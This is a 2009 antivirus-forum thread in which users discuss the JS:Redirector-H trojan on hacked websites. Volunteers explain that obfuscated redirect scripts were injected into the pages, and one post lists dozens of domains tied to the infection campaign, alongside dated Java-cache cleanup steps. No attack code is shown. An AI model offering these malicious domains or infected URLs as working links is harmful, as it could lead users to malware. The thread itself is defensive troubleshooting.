Author Topic: JS:Redirector-H [Trj] at website  (Read 35961 times)

0 Members and 1 Guest are viewing this topic.

stevecobb

  • Guest
JS:Redirector-H [Trj] at website
« on: April 29, 2009, 06:08:56 PM »
Avast gives me this Trojan warning @ hxxtp://www.gmdny.com which is a viable New York State contract website.
It appears only Avast picks this up...legitimacy please???
« Last Edit: April 29, 2009, 06:21:09 PM by stevecobb »

Offline Omid Farhang

  • Frontend Developer
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1660
  • I wish I could write longer personal text!!
    • Homepage
Re: JS:Redirector-H [Trj] at website
« Reply #1 on: April 29, 2009, 06:12:07 PM »
Hello and Welcome to the forum.

when you want to send link to infected websites, please use this format: hXXp://www.infected-site.com/

Good Luck.
Twitter: OmidFarhangEn - OS: Manjaro KDE

stevecobb

  • Guest
Re: JS:Redirector-H [Trj] at website
« Reply #2 on: April 29, 2009, 06:17:58 PM »
OK... is hxxp://www.gmdny.com legitimately infected??

onlysomeone

  • Guest
Re: JS:Redirector-H [Trj] at website
« Reply #3 on: April 29, 2009, 06:19:45 PM »
I think what Omid meant was that you should modify your first post - make the link there unclickable...  ;)

Offline Omid Farhang

  • Frontend Developer
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1660
  • I wish I could write longer personal text!!
    • Homepage
Re: JS:Redirector-H [Trj] at website
« Reply #4 on: April 29, 2009, 06:20:59 PM »
well, I did not find anything wrong about this site, look like clean.
Twitter: OmidFarhangEn - OS: Manjaro KDE

stevecobb

  • Guest
Re: JS:Redirector-H [Trj] at website
« Reply #5 on: April 29, 2009, 06:23:16 PM »
Why am I getting the warning of JS:Redirector-H [trj] from Avast for the site then?

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
Re: JS:Redirector-H [Trj] at website
« Reply #6 on: April 29, 2009, 06:30:27 PM »
Avast gives me this Trojan warning @ hxxtp://www.gmdny.com which is a viable New York State contract website.
It appears only Avast picks this up...legitimacy please???

The site has been hacked, there is a large chunk of obfuscated javascript just before the opening Body tag of that page, see image. I modified the code to make it easier to see in the image as it is on a single line.

avast is all over these injection infections like a rash.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline Omid Farhang

  • Frontend Developer
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1660
  • I wish I could write longer personal text!!
    • Homepage
Re: JS:Redirector-H [Trj] at website
« Reply #7 on: April 29, 2009, 06:44:02 PM »
The site has been hacked, there is a large chunk of obfuscated javascript just before the opening Body tag of that page, see image. I modified the code to make it easier to see in the image as it is on a single line.

avast is all over these injection infections like a rash.
David, do you know a tool to make this script able to read a little easier than what it is now?  ???
Twitter: OmidFarhangEn - OS: Manjaro KDE

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: JS:Redirector-H [Trj] at website
« Reply #8 on: April 29, 2009, 07:13:29 PM »
Hi stevecobb,

Here is information about this malware: http://www.microsoft.com/security/portal/Entry.aspx?Name=Trojan:JS/Redirector.H
In general about these SQL-injecting threats read: http://blogs.technet.com/antimalware/
A list of compromised sites you can find here:
http://www.shadowserver.org/wiki/

Sites that were infected with JS-redirector-H:
Domain

nihaorr1.com                               
free.hostpinoy.info         
xprmn4u.info                 
nmidahena.com             
winzipices.cn                 
sb.5252.ws                   
aspder.com                 
11910.net                     
bbs.jueduizuan.com       
bluell.cn                     
2117966.net                 
s.see9.us
xvgaoke.cn
1.hao929.cn
414151.com
cc.18dd.net
yl18.net
kisswow.com.cn
urkb.net
c.uc8010.com
rnmb.net
ririwow.cn
killwow1.cn
qiqigm.com
wowgm1.cn
wowyeye.cn
9i5t.cn
computershello.cn
z008.net
b15.3322.org
direct84.com
caocaowow.cn
qiuxuegm.com
firestnamestea.cn
a.ka47.us
a188.ws
qiqi111.cn
   
Approximate # of
Pages Injected between ranking between 440,000 and 230

What to do?
Empty the temporary java cache. [Located in the java console].
Here are the instructions on how to manually remove these malicious applets from the JRE cache directory:

From the Start button, click Settings > Control Panel
In the Control Panel, open the "Java Plug-in Control Panel"
Select the Cache Tab
Click the Clear button inside the Cache Tab, which will clear your JRE cache directory
pictures: http://www.dslreports.com/forum/remark,13803204

To verify current version of Java installed use this tool: »www.java.com/en/download/installed.jsp

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Omid Farhang

  • Frontend Developer
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1660
  • I wish I could write longer personal text!!
    • Homepage
Re: JS:Redirector-H [Trj] at website
« Reply #9 on: April 29, 2009, 07:24:33 PM »
Hi stevecobb,

**
polonus

Thanks for the info :)
Twitter: OmidFarhangEn - OS: Manjaro KDE

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
Re: JS:Redirector-H [Trj] at website
« Reply #10 on: April 29, 2009, 08:14:37 PM »
Avast gives me this Trojan warning @ hxxtp://www.gmdny.com which is a viable New York State contract website.
It appears only Avast picks this up...legitimacy please???

The site has been hacked, there is a large chunk of obfuscated javascript just before the opening Body tag of that page, see image. I modified the code to make it easier to see in the image as it is on a single line.

avast is all over these injection infections like a rash.

I don't have a definitive script to check it, ther is a site I use on occasion, http://www.felgall.com/javamet6.htm when trying to look at unescape script like that above. However, there are frequent times when even that doesn't reveal the true intent. Alwil software have their own script checking tool so they are able to decode what the intent is (redirection, probably to a malicious site/script).

So suffice to say that javascript is a plain language scripting language, so when people go to these length to hide the purpose that makes me very suspicious.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline Omid Farhang

  • Frontend Developer
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1660
  • I wish I could write longer personal text!!
    • Homepage
Re: JS:Redirector-H [Trj] at website
« Reply #11 on: April 29, 2009, 08:20:04 PM »
Thanks David for the link, I appreciate it :)
I know about Alwil and their program to read those kind of script.
Twitter: OmidFarhangEn - OS: Manjaro KDE

FKonline

  • Guest
Re: JS:Redirector-H [Trj] at website
« Reply #12 on: April 29, 2009, 08:21:02 PM »
Another website where my avast alerts detecting such a JS:Redirector-H [trj]:
- hXXp://www.4allclients.de/?action=4&id=1894777&utm_source=GB_DE [+ blocked bad network (hXXp://gumblar.cn/rss/?id=5818702)]

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
Re: JS:Redirector-H [Trj] at website
« Reply #13 on: April 29, 2009, 08:55:46 PM »
Yes this is a fast growing exploit hacking legit sites and injecting either iframe or script tags into the page/s to redirect to a malicious site where the payload resides. The script responsible for the redirect is at the bottom of the page, see image1

There is also another alert on that site as the favicon.ico file has been replaced with an html page purporting to be a 404 error page redirecting also to a malicious site, image2 & 3.

So you should report it to the site owner/webmaster, etc.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Allex

  • Guest
Re: JS:Redirector-H [Trj] at website
« Reply #14 on: April 29, 2009, 10:12:06 PM »
Hello, this is my first post here.
I am the owner of a small website with a phpbb forum called hxxt://www.problemefiat.ro . Problem is I've been hit by this  JS:Redirector-H [trj] 3 days ago . So far I tried cleaning the php code...no result. Today I have deleted my files from the hosting and copied a back-up I have made a while back. The site stayed clean for about 16 hours and now is infected again. Does anyone know how to protect your website from these type of atacks? Or do I need to restore my back-up every day ? :(
Thanks!